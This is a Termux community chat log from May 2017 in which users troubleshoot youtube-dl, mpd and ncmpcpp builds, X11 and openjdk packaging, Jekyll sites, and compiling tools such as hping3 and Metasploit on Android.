2017-05-13 20:10:09 JohnOlinda[m] Has anyone used youtube-dl
in Termux with success? I guess the key would be accessing the files after they’re downloaded?
2017-05-13 20:10:37 live_the_dream yeah pip install youtube-dl
2017-05-13 20:11:00 live_the_dream the only reason its not a package in termux is because its so easy to use pip instead
2017-05-13 20:13:09 bokuno yeah, youtube-dl works well in Termux
2017-05-13 20:15:23 swift110 that would be coo;
2017-05-13 20:15:30 swift110 you can use pip in termux?
2017-05-13 20:16:24 bokuno install python3 then you got pip
2017-05-13 20:16:25 JohnOlinda[m] That’s affirmative. Just tried it and it is downloading now. Now I’ve just got to figure out where the files live in the phone storage.
2017-05-13 20:16:46 bokuno in current dir
2017-05-13 20:17:23 gitter1 (cocodevienne) pwd
2017-05-13 20:18:56 JohnOlinda[m] Right, but I want to see if I can get it to play either in mpv via Termux or mpv via the Play Store.
2017-05-13 20:19:30 JohnOlinda[m] OK, that’s a nope for mpv via Termux.
2017-05-13 20:21:07 JohnOlinda[m] So the files would have to be downloaded outside Termux’s sandboxed storage to be accessible to mpv app.
2017-05-13 20:26:19 JohnOlinda[m] OK, well termux-setup-storage
ran smoothly, so Plan B should work fine.
2017-05-13 20:30:58 JohnOlinda[m] Cool.
2017-05-13 20:34:10 swift110 ok
2017-05-13 20:37:27 bokuno yeah ~/storage/shared is your SDcard root
2017-05-13 21:30:44 live_the_dream k i went through mpd + ncmpcpp the setup on install of both should just work(tm)
2017-05-13 23:23:49 gitter1 (vishalbiswas) thread_db was removed from bionic ages ago, but, the include file still lives in the ndk
2017-05-14 02:27:14 gitter1 (vishalbiswas) @fornwall I propose merging x11 into main repo, but, only using it for packages that don’t have a cli. that means, mpv and others don’t get an X11 version
2017-05-14 02:28:40 gitter1 (vishalbiswas) I say this mainly because of openjdk. A large number of java packages are gui based.
2017-05-14 03:14:59 live_the_dream at this stage seperate repo is probably best at least in the short term
2017-05-14 03:15:50 live_the_dream also mpv having a gui wouldnt be that bad since mpd … is actually working
2017-05-14 03:30:02 live_the_dream https://imgur.com/a/e1v8G purty
2017-05-14 03:34:27 live_the_dream https://imgur.com/a/APSpI …
2017-05-14 03:35:01 pppppp Can we install all the things like on linux
2017-05-14 03:35:14 pppppp Metasploit
2017-05-14 03:35:22 live_the_dream meta sploit can be installed
2017-05-14 03:35:27 live_the_dream but its a little of effort
2017-05-14 03:35:30 pppppp And other tools
2017-05-14 03:35:41 live_the_dream radare2 gdb clang
2017-05-14 03:36:12 pppppp Can we do penetration work like kali
2017-05-14 03:36:40 live_the_dream hmm
2017-05-14 03:42:00 live_the_dream i love how the touch screen works in ncmcpp witout any effort on my part
2017-05-14 03:56:47 pppppp Can any one tell me how termux works
2017-05-14 03:57:06 pppppp Is it any deploy of linux/unix
2017-05-14 04:25:28 live_the_dream no its native
2017-05-14 04:25:33 live_the_dream its built with ndk
2017-05-14 04:25:38 live_the_dream its on android file system
2017-05-14 05:20:15 frumpylava Is there any filesytem I can format my external sdcard to that would allow symlinking? On an unrooted android. I tried various things like ext4 already, but it doesn’t get recognized.
2017-05-14 05:44:09 live_the_dream on unrooted? no
2017-05-14 07:13:07 live_the_dream termux sixel when?
2017-05-14 07:40:23 gitter1 (barjolem) Hi everyone! I’m quite new with termux and I would like to know if it’s possible to compile other tools like recon-ng or hping3 on termux? Thx!
2017-05-14 08:19:07 live_the_dream python stuff shkuld be good to go
2017-05-14 08:23:11 live_the_dream the issue is android restrictions
2017-05-14 09:00:47 gitter1 (barjolem) Yeah, it’s ok for recon but i’m not sure how to do for hping
2017-05-14 09:01:43 live_the_dream i just compiled hping it needs root to rub
2017-05-14 09:02:32 gitter1 (barjolem) Can you help me with the procedure? I’ve just download hping sources from kali repo. No problem about root
2017-05-14 09:03:36 live_the_dream on device compile need to set up libandroid-shmem-dev
2017-05-14 09:04:05 gitter1 (barjolem) Please, follows this steps:
2017-05-14 09:04:05 gitter1 (barjolem)
2017-05-14 09:04:05 gitter1 (barjolem) $ ./configure (first try ./configure –help)
2017-05-14 09:04:05 gitter1 (barjolem) [full message: https://gitter.im/termux/termux?at=591855c49f4f4ab05bc2470d]
2017-05-14 09:04:10 gitter1 (barjolem) Is this ok?
2017-05-14 09:05:21 live_the_dream doing that works for normal unix/linux but android is a tad dofferent
2017-05-14 09:05:50 gitter1 (barjolem) Ok thanks. I’ve downloaded libandroid-shmem-dev
2017-05-14 09:05:51 live_the_dream the lib location in makefile is not coreect
2017-05-14 09:06:16 gitter1 (mklein994) Thanks live_the_dream. ncmpcpp
works really well. Didn’t think I’d see the day…
2017-05-14 09:06:45 live_the_dream i have 6 outputs listed on mpd
2017-05-14 09:06:48 live_the_dream hehe
2017-05-14 09:07:22 gitter1 (barjolem) You mean in hping install file?
2017-05-14 09:07:23 live_the_dream opensles openal httpd null the equalizer vorbis encoding
2017-05-14 09:07:44 live_the_dream no tlinking the hping3
2017-05-14 09:07:47 live_the_dream linking
2017-05-14 09:09:37 gitter1 (barjolem) I don’t understand sorry, I have to change a path to the lib?
2017-05-14 09:10:07 live_the_dream barjolem im about to go to sleep give me a shlut in about 12 houts…
2017-05-14 09:10:19 live_the_dream hours
2017-05-14 09:10:21 live_the_dream ../
2017-05-14 09:10:51 gitter1 (barjolem) Ok no problem, thanks you!
2017-05-14 09:35:40 gitter1 (vishalbiswas) live_the_dream: From your repo
2017-05-14 09:35:45 gitter1 (vishalbiswas) CANNOT LINK EXECUTABLE: could not load library "libid3tag.so.0" needed by "/data/data/com.termux/files/usr/libexec/mpd"; caused by library "libid3tag.so.0" not found
2017-05-14 09:37:23 gitter1 (vishalbiswas) You forgot to add libid3tag
to deps
2017-05-14 09:47:08 gitter1 (vishalbiswas) @mklein994 How do I create mpd database?
2017-05-14 10:42:58 gitter1 (mklein994) First make sure that your mpd.conf is how you like it (music_database, and other settings). Create the necessary files (e.g. mkdir -p ~/.config/mpd/playlists && touch ~/.config/mpd/{database,socket,pid,state,sticker.sql}
). Then update the mpd database with mpc -h ~/.config/mpd/socket update --wait
.
2017-05-14 10:43:53 gitter1 (mklein994) The wait flag makes it blocking.
2017-05-14 10:49:12 gitter1 (mklein994) @vishalbiswas see above. Also, the arch wiki has a good section on this.
2017-05-14 10:49:49 gitter1 (mklein994) https://wiki.archlinux.org/index.php/Music_Player_Daemon
2017-05-14 10:53:27 gitter1 (vishalbiswas) @mklein994 mpd error: Connection reset by peer
2017-05-14 11:03:45 gitter1 (mklein994) Sorry, I can’t help in depth now. I’ll be available later today.
2017-05-14 11:06:19 gitter1 (vishalbiswas) @mklein994 no probs
2017-05-14 13:10:01 gitter1 (vishalbiswas) @fornwall is there in buildorder.py for TERMUX_PKG_DEPENDS that change based on arch?
2017-05-14 13:10:32 gitter1 (vishalbiswas) I mean, I want to add a dep if the arch is x86_64
2017-05-14 13:26:07 gitter1 (mklein994) OK so that’s a weird error. Normally it would be something like “can’t bind to 0.0.0.0:8600” or something similar (which you can safely ignore). Is there anything useful in the log file you created?
2017-05-14 13:26:16 gitter1 (mklein994) @vishalbiswas
2017-05-14 13:27:31 gitter1 (vishalbiswas) did you build it yourselves or did you use his repo? @mklein994
2017-05-14 13:28:15 gitter1 (mklein994) I used the repo. It’s been pretty rapidfire on the updates lately.
2017-05-14 13:30:46 gitter1 (mklein994) deb [trusted=yes] https://its-pointless.github.io/files/ termux extras
2017-05-14 13:31:04 gitter1 (vishalbiswas) ```-bash-4.4$ mpd
2017-05-14 13:31:04 gitter1 (vishalbiswas) exception: Failed to open /data/data/com.termux/files/home/.mpd/database: No such file or directory```
2017-05-14 13:31:58 gitter1 (vishalbiswas) if I touch database, I get database corrupted
2017-05-14 13:34:27 gitter1 (mklein994) Yeah. For some reason I had experienced the same thing. I just rm
ed it and recreated it and it worked. Maybe it has to have a different timestamp to allow the update? I dunno.
2017-05-14 13:35:22 gitter1 (vishalbiswas) mpd just quits with bus error whenever I try to run mpc
2017-05-14 13:36:50 gitter1 (mklein994) Try running mpd --no-daemon --verbose --stderr
2017-05-14 13:37:09 gitter1 (mklein994) Make sure to pkill mpd
first.
2017-05-14 13:38:35 gitter1 (mklein994) Does mpc help show stuff?
2017-05-14 13:43:47 gitter1 (vishalbiswas) mpd shows bus error on first mp3
2017-05-14 13:43:47 gitter1 (vishalbiswas) ```May 14 23:11 : update: spawned thread for update job id 1
2017-05-14 13:43:47 gitter1 (vishalbiswas) May 14 23:11 : update: starting
2017-05-14 13:43:47 gitter1 (vishalbiswas) [full message: https://gitter.im/termux/termux?at=5918975333e9ee771ca750ac]
2017-05-14 17:20:06 live_the_dream @vishal mpd is thrraded so it changes permissions of database / state file
2017-05-14 17:21:29 gitter1 (barjolem) Hi!
2017-05-14 17:23:11 gitter1 (barjolem) I think I understood what you were saying last time : we can’t do a standard “make” because of all the paths /usr/bin etc?
2017-05-14 17:24:39 gitter1 (barjolem) I was looking for a way to change all these paths but i didn’t find one.. on github, some people sugested to use chroot
2017-05-14 17:27:33 gitter1 (barjolem) @TermuxBot
2017-05-14 17:49:06 gitter1 (cocodevienne) Uhm why can’t I install Jekyll on Termux???
2017-05-14 18:08:47 gitter1 (mklein994) @cocodevienne I’ve got it running fine.
2017-05-14 18:11:17 gitter1 (cocodevienne) Got it running, just had to install some extra libs. Btw: Do you or does anyone know, why I am getting so many downloads on my Ruby Gem? It’s only been out in the wild for about 48 hrs. Does anyone know for sure why I have so many downloads? @mklein994
2017-05-14 18:13:20 gitter1 (mklein994) @cocodevienne I don’t have a hot clue. The only thing I can think of is other sites scraping the one your hosting on to put on their site.
2017-05-14 18:14:16 gitter1 (cocodevienne) But they wouldn’t actually run a download on the binary package?
2017-05-14 18:14:43 gitter1 (cocodevienne) @mklein994
2017-05-14 18:16:16 gitter1 (mklein994) As I said, that’s just me making stuff up.
2017-05-14 18:18:03 gitter1 (cocodevienne) Ok^^. Thanks for making a guess though!:)
2017-05-14 18:20:43 gitter1 (mklein994) @vishalbiswas any luck with mpd?
2017-05-14 18:31:36 Retr0 hello
2017-05-14 18:32:52 JohnOlinda[m] Howdy!
2017-05-14 18:33:31 Retr0 :)
2017-05-14 18:33:41 Retr0 you are speak spanish?
2017-05-14 18:34:23 Retr0 ???
2017-05-14 18:36:24 gitter1 (cocodevienne) Qué pasá?
2017-05-14 18:42:31 JohnOlinda[m] No, I’m sorry, I don’t speak Spanish 🙁
2017-05-14 18:42:31 JohnOlinda[m] No, lo siento, no hablo español 🙁
2017-05-14 18:45:29 gitter1 (cocodevienne) I was talking to @Retr0
2017-05-14 18:45:31 gitter1 (cocodevienne) Anyways.
2017-05-14 18:58:02 live_the_dream barjolem https://its-pointless.github.io/hping3patch.patch
2017-05-14 18:58:19 gitter1 (barjolem) Thanks!
2017-05-14 18:59:12 live_the_dream just have to install tcl-dev and libandroid-shmem-dev
2017-05-14 18:59:26 live_the_dream in root for it to work use tsu command in termux
2017-05-14 18:59:31 live_the_dream to get root shell
2017-05-14 19:00:17 live_the_dream but yeah ./configure ; make -j4 ; make install should work
2017-05-14 19:00:17 gitter1 (barjolem) Ok
2017-05-14 19:00:35 gitter1 (barjolem) So how did you do?
2017-05-14 19:00:43 live_the_dream how did i do it?
2017-05-14 19:00:51 gitter1 (barjolem) Yes
2017-05-14 19:01:07 gitter1 (barjolem) In case i would like to use other tools
2017-05-14 19:01:29 live_the_dream a few #include stuff wasn’t wrong
2017-05-14 19:01:31 live_the_dream was wrong
2017-05-14 19:01:40 live_the_dream termux-fix-shebang …
2017-05-14 19:01:56 live_the_dream to fix stuff but a lot of install paths were not portable
2017-05-14 19:02:08 gitter1 (barjolem) Ok
2017-05-14 19:03:03 live_the_dream libpcap-dev needs to be installed as well
2017-05-14 19:03:07 gitter1 (barjolem) About metasploit, i saw you spoke about it earlier, is it really hard to make it run on termux?
2017-05-14 19:05:58 live_the_dream vishal is who you talk to about that
2017-05-14 19:06:16 live_the_dream there was a download link somewhere it was even mentioned in gitter
2017-05-14 19:07:25 live_the_dream now to fix mpd behaviour since it messes with permissions on database files etc
2017-05-14 19:08:05 live_the_dream now sinec bin/mpd needs to be a script itself launch libexec/mpd we can do it straight there to fix behaviour
2017-05-14 19:08:31 gitter1 (mklein994) live_the_dream: you did that already, right?
2017-05-14 19:08:59 live_the_dream not quite
2017-05-14 19:09:19 live_the_dream a few more adjustments as well i need to do to get the behvaiour right
2017-05-14 19:10:04 gitter1 (mklein994) OK. I’ll be here a little while if you need a rubber duck.
2017-05-14 19:10:40 gitter1 (barjolem) A download link for metasploit? I’m gonna find that!
2017-05-14 19:11:22 gitter1 (cocodevienne) @MD5HashBrowns
2017-05-14 19:11:40 gitter1 (cocodevienne) @mklein994 Been playing around a while with the So simple Theme…
2017-05-14 19:12:31 gitter1 (mklein994) @cocodevienne I don’t follow.
2017-05-14 19:12:41 gitter1 (cocodevienne) For Jekyll and when I serve the oage with bundle exec serve
I see a nicely formatted page, but I can’t find that page in the original source. I want to chsnge it to fit my needs. What to do?
2017-05-14 19:12:46 gitter1 (cocodevienne) @mklein994
2017-05-14 19:15:26 gitter1 (cocodevienne) Here’s the link to the theme: https://github.com/mmistakes/so-simple-theme.git
2017-05-14 19:16:17 gitter1 (mklein994) You might have better luck at https://gitter.im/jekyll/jekyll
2017-05-14 19:17:27 gitter1 (cocodevienne) Right you are! Wrong channel!;)
2017-05-14 20:55:43 gitter1 (mklein994) I’m having an odd problem: my docker image is missing build-package.sh
(or so it seems).
2017-05-14 20:55:43 gitter1 (mklein994) ```console
2017-05-14 20:55:43 gitter1 (mklein994) $ sudo ./scripts/run-docker.sh ./build-package.sh -a arm libandroid-support
2017-05-14 20:55:43 gitter1 (mklein994) [full message: https://gitter.im/termux/termux?at=5918fc8e2b926f8a675648ac]
2017-05-14 21:57:02 gitter1 (barjolem) Finally metasploit is running! ✌
2017-05-14 21:57:36 live_the_dream try just updated mpd if you want …
2017-05-14 21:58:08 gitter1 (barjolem) But still can’t run msfupdate..
2017-05-14 22:00:11 live_the_dream oh wait i fucked it up
2017-05-14 22:00:25 live_the_dream no i didnt…
2017-05-14 22:26:03 live_the_dream ppl try it anyway
2017-05-14 22:27:31 gitter1 (vishalbiswas) Just don’t let me wipe out my data and it’ll all be fine
2017-05-14 22:28:09 live_the_dream oh you using data rather than wifi?
2017-05-14 22:28:14 live_the_dream k
2017-05-14 22:28:42 live_the_dream i need you to test texlive by installing everthing ;)
2017-05-14 22:31:23 gitter1 (vishalbiswas) No, I mean my files
2017-05-14 22:32:18 gitter1 (vishalbiswas) You should also add the conf files to TERMUX_PKG_CONFFILES
. Just wiped out my customisations
2017-05-14 22:32:41 live_the_dream oh right …
2017-05-14 22:34:01 live_the_dream sorry
2017-05-14 22:35:30 gitter1 (vishalbiswas) Still getting Bus error
2017-05-14 22:36:46 live_the_dream exact error ?
2017-05-14 22:37:31 live_the_dream and could you show me /system/lib /system/lib64 directory contents?
2017-05-14 22:37:49 live_the_dream and /system/vendor as well?
2017-05-14 22:38:33 live_the_dream just a list of all system libs…
2017-05-14 22:46:33 gitter1 (vishalbiswas) live_the_dream: https://pastebin.com/jD715w3S
2017-05-14 22:51:37 gitter1 (vishalbiswas) Its trying to write to /dev/log/main. Is it okay?
2017-05-14 22:53:20 gitter1 (vishalbiswas) Ignore the log comment, it doesn’t matter
2017-05-14 22:54:04 gitter1 (vishalbiswas) It receives the error just after reading the mp3 file
2017-05-14 22:55:50 live_the_dream just having lunch nee build in a little
2017-05-14 22:57:25 gitter1 (vishalbiswas) strace output -> https://drive.google.com/file/d/0B8Q4yBRb9PSHc05XN2otNktka2M/view?usp=drivesdk
2017-05-14 23:25:36 live_the_dream try it now
2017-05-14 23:26:01 live_the_dream i think i know what happened iv seen mpd logs talking of boring ssl
2017-05-14 23:26:09 live_the_dream i thought that was weird
2017-05-14 23:26:18 live_the_dream its now using our ssl
2017-05-14 23:26:33 live_the_dream a few more libs in preload section
2017-05-14 23:27:47 live_the_dream we have never had a music app that used curl and ssl etc
2017-05-14 23:32:53 gitter1 (vishalbiswas) “Bus error”. Its getting terminated by SIGBUS
2017-05-14 23:33:32 live_the_dream remove all out sound output but null
2017-05-14 23:34:35 gitter1 (vishalbiswas) Its quits on update, not play
2017-05-14 23:35:33 live_the_dream you need the music dir to exist where it searches
2017-05-14 23:35:46 live_the_dream remove database from ~/.mpd/
2017-05-14 23:35:55 live_the_dream then again just remove ~/.mpd dir
2017-05-14 23:36:32 live_the_dream i don’t think music dir can exist outside our little bit
2017-05-14 23:36:46 live_the_dream remove update dir stuff from config?
2017-05-14 23:37:32 live_the_dream it could be poll usuage … but epoll is not working on it … so i dunno
2017-05-14 23:39:48 live_the_dream you can have symlinks in our stuff and it will work
2017-05-14 23:39:49 live_the_dream i think
2017-05-14 23:43:52 live_the_dream on installation i suppose it make .music dir and ln -s /sdcard/Music/* ./
2017-05-14 23:49:39 gitter1 (vishalbiswas) Tried symlinking, copying mp3 to $HOME/music (and setting music_dir appropriately). No go
2017-05-14 23:51:34 gitter1 (vishalbiswas) I uploaded the wrong tracefile wait
2017-05-14 23:52:57 gitter1 (vishalbiswas) Here, see strace -> https://drive.google.com/file/d/0B8Q4yBRb9PSHeFlKYWhsSnRxY00/view?usp=drivesdk
2017-05-14 23:53:09 gitter1 (vishalbiswas) Quits just after reading the mp3
2017-05-15 00:14:38 gitter1 (vishalbiswas) btw, I had some success with openjdk
2017-05-15 00:14:46 gitter1 (vishalbiswas) now only aarch64 build fails
2017-05-15 00:15:44 live_the_dream sigh
2017-05-15 00:31:25 gitter1 (vishalbiswas) aarch64 fails while compiling ThreadLocalStorage
2017-05-15 00:55:17 live_the_dream k another build is up
2017-05-15 00:55:39 live_the_dream also i couldn’t ocmpile x
2017-05-15 00:55:43 live_the_dream also i couldn’t ocmpile X11
2017-05-15 00:56:44 gitter1 (vishalbiswas) what did you get?
2017-05-15 00:57:35 gitter1 (vishalbiswas) probably something to do with outb, inb, etc?
2017-05-15 00:57:55 live_the_dream error: unknown type name ‘DrawablePtr’; did you mean ‘Drawable’?
2017-05-15 00:58:06 gitter1 (vishalbiswas) aarch64?
2017-05-15 00:58:09 live_the_dream no
2017-05-15 00:59:11 gitter1 (vishalbiswas) which arch then?
2017-05-15 00:59:17 live_the_dream arm
2017-05-15 01:00:58 gitter1 (vishalbiswas) you probably followed the wrong sequence of build
2017-05-15 01:01:13 gitter1 (vishalbiswas) I haven’t worked out the dependency tree yet
2017-05-15 01:01:32 gitter1 (vishalbiswas) first build x11-proto
2017-05-15 01:01:45 gitter1 (vishalbiswas) it has all protocol headers, then xtrans
2017-05-15 01:03:50 live_the_dream k
2017-05-15 01:03:56 live_the_dream now try latest mpd build
2017-05-15 01:05:10 gitter1 (vishalbiswas) I already have the latest one
2017-05-15 01:05:22 live_the_dream i just upped it
2017-05-15 01:05:27 live_the_dream redownload
2017-05-15 01:07:25 gitter1 (vishalbiswas) did you forget to update revision?
2017-05-15 01:10:13 live_the_dream yer
2017-05-15 01:10:21 live_the_dream i would be at revision 100 by now
2017-05-15 01:12:02 gitter1 (vishalbiswas) still bus error
2017-05-15 01:14:22 gitter1 (vishalbiswas) maybe its my mp3 file
2017-05-15 01:19:14 gitter1 (vishalbiswas) now it doesn’t read my ~/music
2017-05-15 01:51:07 live_the_dream k last one for today
2017-05-15 01:52:53 live_the_dream this might actually work
2017-05-15 01:57:11 gitter1 (vishalbiswas) shows database update finish but doesn’t show any files
2017-05-15 01:58:20 gitter1 (vishalbiswas) after i switched music_dir to /sdcard, it says Aborted
2017-05-15 01:59:18 gitter1 (vishalbiswas) still bus error
2017-05-15 02:00:01 live_the_dream you have to remove database file
2017-05-15 02:00:06 live_the_dream and try again
2017-05-15 02:00:13 live_the_dream keep it in ~/music
2017-05-15 02:00:25 live_the_dream press 2 twice
2017-05-15 02:05:28 gitter1 (vishalbiswas) its related to the mp3 files i have, I tried another one and it works
2017-05-15 02:07:28 gitter1 (vishalbiswas) half of my files work and the rest just cause bus error
2017-05-15 02:08:00 live_the_dream weird
2017-05-15 02:08:31 gitter1 (vishalbiswas) is there a tool to like… verify mp3 files?
2017-05-15 02:09:39 gitter1 (vishalbiswas) mpv can play just fine
2017-05-15 05:23:23 gitter1 (vishalbiswas) why do we have open in stdio.h?
2017-05-15 09:24:52 gitter1 (fornwall) @vishalbiswas about TERMUX_PKG_DEPENDS
and arch-dependent values, I guess we could add that if needed (and pass the arch to buildorder.py)
2017-05-15 09:26:11 gitter1 (fornwall) @vishalbiswas open in stdio.h
- do you mean this: https://github.com/termux/termux-packages/blob/master/ndk_patches/stdio.h.patch#L65
2017-05-15 11:31:04 gitter1 (vishalbiswas) @fornwall no problems. I worked around it
2017-05-15 12:47:01 gitter1 (vishalbiswas) does anybody has any idea about how would gtk would be implemented without GL?
2017-05-15 15:56:01 gitter1 (fornwall) @vishalbiswas GL? as in OpenGL?
2017-05-15 17:53:13 gitter1 (fornwall) version 0.49 of Termux, just released, finally exports TMPDIR - don’t know why I delayed that so long :)
2017-05-15 18:18:09 rods-tab3 env: TMPDIR=/data/data/com.termux/files/usr/tmp
2017-05-15 19:01:03 live_the_dream @vishalbiswas can you upload a mp3 that causes mpd to crash?
2017-05-15 19:07:40 rods-tab3 how tell termux version ?
2017-05-15 19:10:07 van777 rods-tab3: long tap termux icon - App info
2017-05-15 19:11:19 gitter1 (mklein994) Just like you would with any other app.
2017-05-15 19:17:14 rods-tab3 icon where ? settings/app/termux says version 0.49
2017-05-15 19:18:13 rods-tab3 does the beta version show any difference ?
2017-05-15 19:20:32 live_the_dream what beta version?
2017-05-15 19:21:13 rods-tab3 termux beta
2017-05-15 19:22:08 live_the_dream there is a beta version?
2017-05-15 19:27:54 rods-tab3 according to the google store - said join beta - did so - whats the diff ?
2017-05-15 19:30:11 live_the_dream i have no idea
2017-05-15 19:34:47 rods-tab3 what icon do you long tap to get apt info ?
2017-05-15 19:35:35 van777 rods-tab3: i tried both. the Shortcut on the launcher and in aplications list
2017-05-15 19:36:39 rods-tab3 nojoy here in android 6.0 – it just selects the icon for movement
2017-05-15 19:37:00 van777 ah. i’ve got Nova launcher
2017-05-15 19:37:30 rods-tab3 on the home page / must be the diff / stock google launcher here
2017-05-15 19:38:02 van777 settings - applications…
2017-05-15 19:38:28 rods-tab3 settings/apps/termux shows v 0.49 (no beta)
2017-05-15 19:42:24 rods-tab3 termux-info says version <= 0.48 ????????
2017-05-15 19:42:57 rods-tab3 where is the main termux executable kept ?
2017-05-15 19:43:53 live_the_dream if you mean the command termux-info
2017-05-15 19:44:04 live_the_dream that currently has no way to detect termux-app
2017-05-15 19:44:14 live_the_dream so it just outputs a static number in the script
2017-05-15 19:46:51 rods-tab3 ok, but ment the main termux programm location ?
2017-05-15 19:49:08 live_the_dream what do you mean?
2017-05-15 19:58:28 rods-tab3 when, i start termux; assume it is running a program ? where is the physical file kept ?
2017-05-15 19:59:40 rods-tab3 process name is com.termix
2017-05-15 20:12:30 gitter1 (mklein994) rods-tab3: it’s spread all over. Some is in /data/app/com.termux-*/
, and other stuff are in $PREFIX/..
, i.e. /data/data/com.termux
. I have a feeling your barking up the wrong tree.
2017-05-15 20:14:26 gitter1 (mklein994) You need root to explore that though.
2017-05-15 20:20:53 live_the_dream termux app should be exporting it
2017-05-15 20:21:17 gitter1 (mklein994) live_the_dream: now there’s an idea.
2017-05-15 20:21:40 gitter1 (mklein994) @fornwall
2017-05-15 20:41:46 rods-tab3 jjust wanted to see if being in the beta - changed any files
2017-05-15 22:47:03 gitter1 (vishalbiswas) @fornwall Yes, OpenGL. I was looking for a way to get gtk over (surfaceless) GLES 2/GLX, but, it seems like glx requires GL (with dri2?).
2017-05-15 22:51:38 live_the_dream there is no way to do that
2017-05-15 22:51:56 live_the_dream the gl drivers in android are not done in a way that allows xwindows
2017-05-15 22:52:10 live_the_dream there has been one driver that did work
2017-05-15 22:52:11 live_the_dream one
2017-05-15 23:00:25 gitter1 (vishalbiswas) but we don’t have gl drivers
2017-05-15 23:00:31 gitter1 (vishalbiswas) only gles ones
2017-05-15 23:01:02 gitter1 (vishalbiswas) thats why i compiled mesa
2017-05-15 23:01:56 gitter1 (vishalbiswas) anyway, it only needs surfaceless rendering to be able to output to Xvnc (I hope)
2017-05-15 23:07:49 gitter1 (vishalbiswas) live_the_dream: that mp3 -> http://stuffdown.com/2015/Skrillex%20&%20Diplo%20-%20Skrillex%20And%20Diplo%20Present%20Jack%20U%20-%20(www.SongsLover.pk)/05.%20To%20U%20(feat.%20AlunaGeorge)%20-%20(www.SongsLover.pk).mp3
2017-05-15 23:11:50 live_the_dream its happening to me
2017-05-15 23:11:56 live_the_dream good i can now bugfix
2017-05-15 23:18:43 live_the_dream and now its working
2017-05-15 23:23:30 live_the_dream try reinstalling now
2017-05-15 23:27:28 live_the_dream if that doesn’t work try renaming the file
2017-05-15 23:49:06 gitter1 (vishalbiswas) what was the problem?
2017-05-15 23:59:53 gitter1 (vishalbiswas) did you try playing over network on another device?
2017-05-16 00:00:22 live_the_dream is it working for you?
2017-05-16 00:08:48 gitter1 (vishalbiswas) i don’t get any sound
2017-05-16 00:09:04 gitter1 (vishalbiswas) tried it on WSL
2017-05-16 00:11:06 gitter1 (vishalbiswas) it works
2017-05-16 00:11:26 gitter1 (vishalbiswas) i just had volume turned down
2017-05-16 01:08:53 frumpylava fornwall: We still don’t have a way to detect Termux version from the shell? termux-info
will now display wrong information until this is resolved.
2017-05-16 01:17:14 rods-tab3 how do you tell if your termux files are in the beta ?
2017-05-16 01:18:17 live_the_dream there is no beta
2017-05-16 01:22:06 gitter1 (vishalbiswas) rods-tab3: your play store listing for Termux will show Termux (Beta)
2017-05-16 01:30:36 rods-tab3 it does
2017-05-16 01:48:59 Gilfoyle- So, I’m curious. Does the packages command have a way to pgp keys? Or I just go straight to apt add-key?
2017-05-16 01:49:22 live_the_dream apt-key add
2017-05-16 01:54:20 Gilfoyle- Danke
2017-05-16 02:14:11 frumpylava Has anyeone been able to compile php-mysqli using phpize on device? I’m getting error: conflicting types for '__errno'
2017-05-16 03:09:48 Gilfoyle- So I’m curious, that pr about using termux in vr mode ever go anywhere?
2017-05-16 03:10:49 frumpylava Gilfoyle-: I don’t think so.
2017-05-16 03:11:58 Gilfoyle- Bollocks. Well that bites.
2017-05-16 03:12:52 frumpylava I’m not sure VR on a per app basis is the right solution. It should be possible to launch all apps in a virtual screen, but perhaps that is something that would have to be baked into the operating system.
2017-05-16 03:13:34 Gilfoyle- Aye. Kinda surprised it hasn’t already.
2017-05-16 03:14:14 Gilfoyle- Guess I can cheat a bit and figure something out.
2017-05-16 03:19:20 frumpylava I’d really like to use Termux in a virutal office.
2017-05-16 03:48:09 noncom38 hi!
2017-05-16 03:48:22 noncom38 how do I close the floating termux window?
2017-05-16 03:48:27 noncom38 w/o killing termux
2017-05-16 03:49:09 frumpylava noncom38: tap the notification
2017-05-16 03:51:33 noncom38 ah, it worked! was burried under other notifications :)
2017-05-16 03:51:33 noncom38 thanks
2017-05-16 04:01:45 noncom my friend has a 4.4 android device and the market says that termux is incompatible with the device… does not it support the 4.x family, or is it something specific for the device?
2017-05-16 04:15:28 gitter1 (n1had5_twitter) I think Lolipop is the minimam android version supported
2017-05-16 04:15:56 gitter1 (n1had5_twitter) because of some sort of libraries not being there or somwthing that I dont actually understand 😂
2017-05-16 04:16:28 gitter1 (n1had5_twitter) something, god damn it gitter why dont you support autocorrection…
2017-05-16 04:23:24 frumpylava noncom: Yeah, Termux will not work on Android 4.4. Minimum is 5.
2017-05-16 04:31:24 noncom ah uh oh awww
2017-05-16 05:21:38 frumpylava Wow, the “error: conflicting types for ‘__errno’”, also appears when building with the build system.
2017-05-16 06:07:08 gitter1 (cocodevienne) Can anyone here help?
2017-05-16 06:07:42 gitter1 (cocodevienne) I have a Jekyll site and when I commit all the files to GitHub Pages it renders the HTML but not the actual styling.
2017-05-16 06:20:39 frumpylava @cocodevienne Your stylesheet doesn’t get loaded because it’s referenced with “http://” and github.io uses “https://”
2017-05-16 06:21:11 frumpylava @cocodevienne just change the link so to “//”, so it uses whatever protocol the whole site uses.
2017-05-16 06:21:50 gitter1 (cocodevienne) You mean in the config?
2017-05-16 06:22:10 gitter1 (cocodevienne) @frumpylava
2017-05-16 06:23:06 frumpylava @cocodevienne yes.
2017-05-16 06:23:06 gitter1 (cocodevienne) Thanks that fixed it.
2017-05-16 06:23:25 gitter1 (cocodevienne) But do I need to commit to both branches when I make a new blog post?
2017-05-16 06:24:43 frumpylava @cocodevienne no? Why do you even have a second branch?
2017-05-16 06:24:58 gitter1 (cocodevienne) No idea
2017-05-16 06:25:07 gitter1 (cocodevienne) How does one delete a branch?
2017-05-16 06:25:51 frumpylava git branch -D
2017-05-16 06:26:08 gitter1 (cocodevienne) thanks
2017-05-16 06:26:19 frumpylava and on github at https://github.com/cocodevienne/cocodevienne.github.io/branches
2017-05-16 06:28:34 frumpylava @cocodevienne, ah you can configure which branch to publish from the repository settings. I guess it could be usefull if multiple people write on the same site.
2017-05-16 06:31:55 gitter1 (cocodevienne) How can I delete the gh-pages branch from the website itsself?
2017-05-16 06:35:38 frumpylava > and on github at https://github.com/cocodevienne/cocodevienne.github.io/branches
2017-05-16 06:36:31 gitter1 (cocodevienne) I do not see any options to delete it though…
2017-05-16 06:51:40 frumpylava @cocodevienne I get a small trashcan that I can click. At least on my repositories. Are you logged in?
2017-05-16 06:54:17 gitter1 (cocodevienne) ‘Tis done already, thanks so fucking much. You saved my morning amigo.❤️
2017-05-16 06:54:30 gitter1 (cocodevienne) @frumpylava
2017-05-16 07:25:36 live_the_dream frumpylava: mpd behaving ?
2017-05-16 07:50:53 frumpylava live_the_dream: Yes, I can now successfully start and stop my mpd service.
2017-05-16 07:51:49 frumpylava live_the_dream: But can you please stop creating ~/music
